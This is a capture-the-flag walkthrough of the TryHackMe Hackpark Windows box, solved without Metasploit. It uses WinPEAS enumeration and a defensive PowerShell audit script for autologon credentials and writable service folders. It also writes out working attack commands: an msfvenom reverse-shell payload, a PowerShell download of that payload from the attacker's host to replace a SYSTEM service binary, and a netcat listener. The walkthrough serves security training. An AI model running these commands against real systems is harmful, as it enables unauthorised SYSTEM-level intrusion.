TryHackMe – My Hackpark Solution (No Metasploit!)


CHALLENGE OVERVIEW

  • Link: hackpark
  • Difficulty: Medium
  • Target: user and root flags on a Windows machine
  • Highlight: hijacking a system process to spawn a reverse shell
  • Tools: nmap, dirb, hydra, burpsuite, msfvenom
  • Tags: RCE (remote code execution), Windows, Winpeas

BACKGROUND

In this walkthrough, we will continue to build on our work in Hackpark I, but this time we will solve the box again without Metasploit.

The general approach will be to use WinPEAS to automate local enumeration of the server. We’ll review the WinPEAS results and continue our privilege escalation by spoofing a system process and throwing an NT AUTHORITY\SYSTEM reverse shell (aka a Windows root shell!).

Watching the first few minutes of the video might be a good review of Hackpark part I, because I quickly go through the final steps of the foothold stage below, starting with payload creation using msfvenom, and then I slow down again for the privilege escalation stage without using Metasploit.

ATTACK MAP

We’ll be picking up on the box from the alternative privesc attack vector shown below (Method 2).

SPIN UP AN HTTP SERVER TO TRANSFER WINPEAS TO TARGET

Issue the following command to spin up a simple HTTP server (port 8000 by default) from the directory that holds the winpeas.exe file:

python3 -m http.server

LOCAL RECON WITH WINPEAS

Run winpeas now:

winpeas.exe

TEST OUT THE AUTO-LOADING USER:PASS COMBO WITH REMOTE DESKTOP

Let’s follow up on WinPEAS’ first interesting finding. We attempt to log in to the server over the remote desktop protocol (RDP) using the autologon credentials it reported.

Unfortunately, this turns out to be a dead end. We’ll move on to other interesting findings.

REVIEW INTERESTING FINDINGS

The other interesting finding from WinPEAS that jumps out at me is:

=========================
	WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
	File Permissions: Everyone [WriteData/CreateFiles]
	Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
	System Scheduler Service Wrapper
========================================================================

It appears that there may be a DLL (dynamic link library) hijacking opportunity with the Windows System Scheduler service: the folder holding its service binary is writable by Everyone.

The file is listed as being located in the folder C:\Program Files (x86)\SystemScheduler. Let’s navigate there in our terminal to see what files might be running a service. On Windows, these files will usually be .exe files.

It looks like the Message.exe file might be the service we need to spoof.

Going forward, we will replace the file with our own malicious payload to spawn a reverse shell. We are hoping that the NT AUTHORITY\SYSTEM account is the one that runs Message.exe, so that the reverse shell gives us SYSTEM-level (root-equivalent) privileges.
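The two WinPEAS findings discussed above (clear-text autologon credentials in the registry, and a service binary sitting in a folder that Everyone can write to) are exactly what a defender should be auditing for. The following PowerShell script is an added example written for this post, not WinPEAS code or anything from the original walkthrough; it reproduces both checks from an elevated prompt on the host being audited. The function and variable names are my own; the registry key and the Win32_Service / Get-Acl calls are standard Windows APIs.

```powershell
# Added example (not from the walkthrough): audit the two misconfigurations
# WinPEAS flagged above, from the defender's side.
#   1. Winlogon autologon settings that leave DefaultPassword in clear text.
#   2. Services whose binary lives in a folder that broad groups can write to
#      (the "Everyone [WriteData/CreateFiles]" condition on SystemScheduler).
# Run elevated. Function and variable names are my own (hypothetical).

# Principals whose write access to a service binary folder is a red flag.
# Caveat: these are the English display names; localized builds differ.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any one of these rights lets a principal drop or replace files in a folder.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, FullControl'

function Get-AutologonFinding {
    # Winlogon stores autologon settings here; DefaultPassword is plain text.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $p) { return $null }
    $hasPassword = -not [string]::IsNullOrEmpty($p.DefaultPassword)
    if ($p.AutoAdminLogon -eq '1' -or $hasPassword) {
        [pscustomobject]@{
            AutoAdminLogon  = $p.AutoAdminLogon
            DefaultUserName = $p.DefaultUserName
            DefaultDomain   = $p.DefaultDomainName
            PasswordStored  = $hasPassword   # report presence only, never the value
        }
    }
}

function Get-ServiceBinaryPath {
    # Extract the executable from a Win32_Service PathName, which may be
    # quoted ("C:\x y\svc.exe" -arg) or unquoted (C:\PROGRA~2\SYSTEM~1\WService.exe).
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 1) { return $PathName.Substring(1, $end - 1) }
        return $null
    }
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $PathName.Split(' ')[0]
}

function Get-WeakWriteAces {
    # Return the Allow ACEs that grant a broad principal write rights on $Folder.
    param([string]$Folder)
    try { $acl = Get-Acl -LiteralPath $Folder -ErrorAction Stop } catch { return $null }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($BroadPrincipals -contains $_.IdentityReference.Value) -and
        (([int]$_.FileSystemRights -band [int]$WriteRights) -ne 0)
    }
}

function Get-WritableServiceFolders {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $bin = Get-ServiceBinaryPath -PathName $svc.PathName
        if (-not $bin) { continue }
        # Resolve 8.3 short names (C:\PROGRA~2\...) to the long path when possible.
        $full = $bin
        if (Test-Path -LiteralPath $bin) { $full = (Get-Item -LiteralPath $bin).FullName }
        $folder = Split-Path -Parent $full
        $weak = Get-WeakWriteAces -Folder $folder
        if ($weak) {
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName      # LocalSystem here means a hijack yields SYSTEM
                Binary    = $full
                Folder    = $folder
                WeakAces  = ($weak | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
            }
        }
    }
}

'--- Autologon check ---'
Get-AutologonFinding | Format-List
'--- Services with broadly writable binary folders ---'
Get-WritableServiceFolders | Format-Table -AutoSize -Wrap

# Remediation for a hit such as the SystemScheduler folder from the WinPEAS
# output above: remove the broad grant (icacls /remove:g strips that principal's
# allow entries), and clear DefaultPassword / set AutoAdminLogon to 0 in Winlogon.
# icacls "C:\Program Files (x86)\SystemScheduler" /remove:g Everyone
```

On the Hackpark box this audit would list WService.exe under C:\Program Files (x86)\SystemScheduler with an Everyone write ACE and, if the autologon password is still in Winlogon, a PasswordStored of True. The service's RunsAs column is the useful extra signal: a writable folder for a service running as LocalSystem is the combination that turns a file-permission slip into a full SYSTEM compromise, which is why the remediation is to fix the folder ACL rather than just the one binary.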

CREATE A REVSHELL WITH MSFVENOM

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe

EXPLOIT THE MACHINE BY SPOOFING A WINDOWS SERVICE

Let’s copy payload.exe over to the Windows machine, rename it Message.exe, and place it in the directory C:\Program Files (x86)\SystemScheduler in two easy steps:

  1. Check to see if the simple HTTP server is still running on port 8000 of the attack machine in the folder that contains payload.exe. If the file location is different from the server, move payload.exe to the current folder that is being served.
  2. Copy the file over to the target machine as Message.exe and place it in the correct SystemScheduler folder by issuing the following command on Windows:
powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"

FIRE UP A NETCAT LISTENER TO CATCH THE REVSHELL

nc -lnvp 9999

(Use whatever port you specified as LPORT in the msfvenom reverse shell payload.)

And now, after waiting a few seconds, we should catch our revshell and confirm that we are NT AUTHORITY\SYSTEM. We can easily retrieve both flags now using the “type” command and finish off the box!

FINAL THOUGHTS

This box was one of the more challenging ones I’ve done yet.

It pushed me to chain together the use of several tools that I’ve used in more simple circumstances but never together. With each new hacking challenge completed, I am finding it easier to understand more complex attack vectors.

The details of decrypting hashes, copying files using HTTP servers, and searching for files and privilege escalation pathways on a target system might seem like a lot to grapple with, but with repetition comes familiarity and the logic of each attack starts to become more obvious.

Thanks for reading my walkthrough! Please let me know in the comments of the YouTube video what you thought of today’s tutorial.